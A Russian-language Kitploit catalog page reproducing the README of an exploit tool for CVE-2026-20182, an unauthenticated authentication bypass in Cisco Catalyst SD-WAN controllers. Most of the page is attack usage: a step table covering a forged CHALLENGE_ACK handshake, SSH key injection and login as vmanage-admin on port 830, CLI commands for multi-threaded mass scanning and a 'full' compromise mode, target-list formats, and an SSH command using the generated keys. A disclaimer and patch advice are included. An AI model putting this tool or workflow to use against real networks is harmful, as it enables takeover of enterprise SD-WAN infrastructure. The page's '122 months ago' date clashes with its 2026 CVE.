Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20182 — Обход аутентификации пиринга Cisco Catalyst SD-WAN | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-20182
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Обход аутентификации пиринга Cisco Catalyst SD-WAN

Репозиторий
122 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20182

Cisco Catalyst SD-WAN Обход аутентификации пиринга

CVE-2026-20182 — Обход аутентификации пиринга Cisco Catalyst SD-WAN

Инструмент оценки для авторизованного тестирования обхода аутентификации пиринга Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
SeverityCritical (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProductCisco Catalyst SD-WAN Controller (ранее vSmart) · Cisco Catalyst SD-WAN Manager (ранее vManage)
IssueМеханизм аутентификации пиринга не применяется корректно
ScriptCVE-2026-20182.py

Краткое описание уязвимости

Май 2026, уведомление: Ошибка в рукопожатии управляющего соединения / аутентификации пиринга позволяет неаутентифицированному удаленному атакующему обойти аутентификацию и получить внутренний доступ с высокими привилегиями к уязвимым системам.

Атакующий отправляет специально сформированные запросы на уязвимую систему. В случае успеха атакующий может аутентифицироваться как внутренняя, высокопривилегированная, не-root учетная запись и получить доступ к NETCONF, что позволяет манипулировать конфигурацией SD-WAN фабрики.

Рекомендация: Примените исправления безопасности Cisco в соответствии с официальными рекомендациями поставщика. Ограничьте доступ к плоскости управления, контролируйте соединения плоскости управления и проверьте контроллеры SD-WAN на наличие несанкционированных изменений конфигурации.


Контакты

Telegram: @KNxploited


Предварительный просмотр консоли

CVE-2026-20182 operations console


Инструмент: CVE-2026-20182.py

Фреймворк эксплойта на Python 3 для CVE-2026-20182 против Cisco SD-WAN vdaemon (UDP/DTLS 12346).

Что он делает (пошагово)

Возврат фабрики: При TEAR_DOWN или несоответствии параметров повторяет альтернативные предустановки domain/site (1,100), (1,1), (0,0), если не указано --no-fallback.


Уровни результатов (внимательно прочитайте)

Важно

  • Режим check → максимум уровень 03 (зонд обхода). Не является доказательством полной эксплуатации.
  • Режим full → стремитесь к уровню 01 (ssh_verified).
  • https://host в списке → только подсказка TCP веб (80/443). Не UDP DTLS на 443.

Требования

root@kitploit:~
pip install -r requirements.txt

OpenSSL (система)

Windows

  1. Установите Win64 OpenSSL 3.x или аналог
  2. Добавьте bin\ в PATH, или укажите:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

Инструмент завершает работу при запуске, если OpenSSL не загружен.


Быстрый старт

Интерактивное меню (по умолчанию)

root@kitploit:~
python CVE-2026-20182.py
  • Настройте параметры 1–11, затем 0 = ЗАПУСК СКАНИРОВАНИЯ
  • Режим запуска по умолчанию: check (безопасный зонд обхода)

Неинтерактивный режим (автоматизация)

root@kitploit:~
python CVE-2026-20182.py -y

Режимы запуска

CHECK — только зонд обхода

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — внедрение ключа + проверка SSH (только авторизованные цели)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

Справочник CLI (каждый флаг + пример)

Цели и рабочие потоки

-f / --file — список целей (по умолчанию: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — рабочие потоки (1–200, по умолчанию 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID по умолчанию, если не указан в списке (по умолчанию: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID по умолчанию, если не указан в списке (по умолчанию: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Режим и автоматизация

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — пропустить интерактивное меню; использовать только значения CLI

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Проверка SSH

--no-ssh-verify — пропустить тест SSH после внедрения (не рекомендуется в режиме full)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — также попробовать TCP 22 после 830

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / фабрика

--no-try-list-udp — только UDP 12346; игнорировать :port из списка

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — лаборатория: дополнительные UDP порты на каждом хосте

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — отключить повтор domain/site при TEAR_DOWN

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Логирование

-v / --verbose — логировать каждое сообщение TX/RX протокола

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

Интерактивное меню (когда -y опущен)


Формат targets.txt

Одна цель на строку. Строки, начинающиеся с #, игнорируются.

Пример файла

root@kitploit:~
# Лабораторные контроллеры — только авторизованные
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

Не поддерживается: IPv6 (только IPv4 / имя хоста).


Выходные файлы

Пример команды SSH (уровень 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

Рекомендуемые рабочие процессы

1) Массовый скрининг хостов (быстро)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

Просмотрите cisco_sdwan_03_bypass_only.jsonl и живую статистику Bypass only.

2) Подтверждение эксплойта на отобранных хостах

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

Просмотрите cisco_sdwan_01_confirmed_ssh.jsonl — единственный файл с ssh_verified: true.

3) Отладка одного хоста (подробно)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

Живая телеметрия (во время сканирования)


Эксплуатационные заметки

  • Режим по умолчанию — check — не записывает ключи и сам по себе не доказывает SSH.
  • Реальный успех = ssh_verified=true только в режиме full.
  • Обновленная / неверная фабрика → часто TEAR_DOWN после CHALLENGE_ACK; включите возврат фабрики или укажите правильный domain/site в списке.
  • Брандмауэр должен разрешать UDP/12346 (и любые дополнительные UDP порты из списка) от вашего сканера к контроллеру.
  • Не сохраняйте sdwan_keys/ или результаты сканирования в публичные репозитории.

Правовое заявление

Данное программное обеспечение предназначено только для авторизованных исследований безопасности, защитного тестирования и обучения.

Вы должны иметь явное письменное разрешение на тестирование любой системы, которая вам не принадлежит или не управляется вами. Несанкционированный доступ к компьютерным системам незаконен. Автор не несет ответственности за неправильное использование, ущерб или юридические последствия, возникающие в результате использования этого инструмента.

Используйте только в системах и сетях, где у вас есть явное разрешение на проведение тестирования безопасности.


Автор: Nxploited ( Khaled Alenazi )

Скачать инструмент
ПунктДетали
Вектор атакиСеть
Необходимые привилегииОтсутствуют
Взаимодействие с пользователемОтсутствует
Область действияИзменена
ВлияниеКонфиденциальность, целостность и доступность — Высокое
ШагФазаОписание
1Загрузка целейПарсинг targets.txt, слияние дубликатов по (host, domain_id, site_id)
2Проверка OpenSSLЗагрузка общих библиотек OpenSSL 3.x/4.x для пользовательского DTLS
3Подключение DTLSПодключение к целевому UDP-порту (сначала 12346, затем опционально список портов)
4CHALLENGEПолучение от сервера CHALLENGE (0x08)
5CHALLENGE_ACKОтправка поддельного CHALLENGE_ACK как vHub (тип 2) — обход аутентификации
6HelloЗавершение обмена Hello — подтверждение пути обхода
7aРежим CHECKОстановка здесь — запись только bypass / Hello OK (без ключей, без SSH)
7bРежим FULLВнедрение открытого ключа SSH через VMANAGE_TO_PEER
8Подтверждение InjectОжидание REGISTER_TO_VMANAGE (0x0D) в качестве подтверждения протокола
9Проверка SSHТестовый вход как vmanage-admin на TCP 830 (NETCONF), опционально 22
10ВыводСортировка результатов в файлы уровней + удобочитаемый список команд
УровеньФайлЗначение
01 — Подтвержденный SSHcisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — единственный уровень, считающийся полным доказательством компрометации
02 — Только Inject ACKcisco_sdwan_02_inject_ack_only.jsonlПротокол принял внедрение ключа; вход по SSH не удался
03 — Только Bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass выполнен; подтвержденного внедрения нет
ТребованиеПримечания
Python3.9+
pipcryptography, rich
OpenSSLОбщие библиотеки 3.x или 4.x (libssl + libcrypto) — обязательно
РежимФлагВнедрение SSHПроверка SSHИспользовать, когда
CHECK--mode check (по умолчанию)НетНетМассовый скрининг, обнаружение обхода
FULL--mode fullДаДа (кроме --no-ssh-verify)Доказательство компрометации
#Опция
1Файл целей
2Рабочие потоки
3DOMAIN_ID по умолчанию
4SITE_ID по умолчанию
5Режим: check / full
6Автоматический повтор фабрики при TEAR_DOWN
7Подробный лог протокола
8Проверка SSH после внедрения
9Также проверять SSH :22
10Пробовать UDP порты из явного списка
11Дополнительные UDP порты (лаборатория)
12Показать справку по формату списка
0▶ ЗАПУСК СКАНИРОВАНИЯ
ФорматПримерПоведение
IP / имя хоста10.0.0.1UDP 12346 + domain/site по умолчанию
IP + UDP порт10.0.0.2:12346Также пробовать UDP порт из списка
IP + порт + домен + сайт10.0.0.3:12346:1:100Полный кортеж фабрики
HTTPS URLhttps://10.0.0.4Хост + только подсказка TCP 443 (не UDP/443)
HTTP URLhttp://10.0.0.5Только подсказка TCP 80
UDP URLudp://10.0.0.6:12346Явный UDP
Табуляция/запятая10.0.0.7 12346 1 100То же, что и четырехпольная форма
Ключ=значение10.0.0.8;port=12346;domain=1;site=100Синтаксис KV через точку с запятой
ФайлСодержание
cisco_sdwan_results.jsonlСырой результат JSON для каждой попытки
cisco_sdwan_success.txtСтроки подтвержденного SSH (разделены табуляцией)
cisco_sdwan_01_confirmed_ssh.jsonlУровень 01 — подтвержденный SSH
cisco_sdwan_02_inject_ack_only.jsonlУровень 02 — inject ACK, SSH не удался
cisco_sdwan_03_bypass_only.jsonlУровень 03 — только bypass / Hello
cisco_sdwan_commands.txtУдобочитаемые команды SSH
cisco_sdwan_findings.jsonСводка сессии + счетчики
sdwan_keys/Сгенерированные закрытые ключи (режим full)
СчетчикЗначение
ПрогрессЦелей выполнено / всего
SSH подтвержденКоличество уровня 01
Inject ACKКоличество уровня 02
Только BypassКоличество уровня 03
Не удалосьОшибки / нет обхода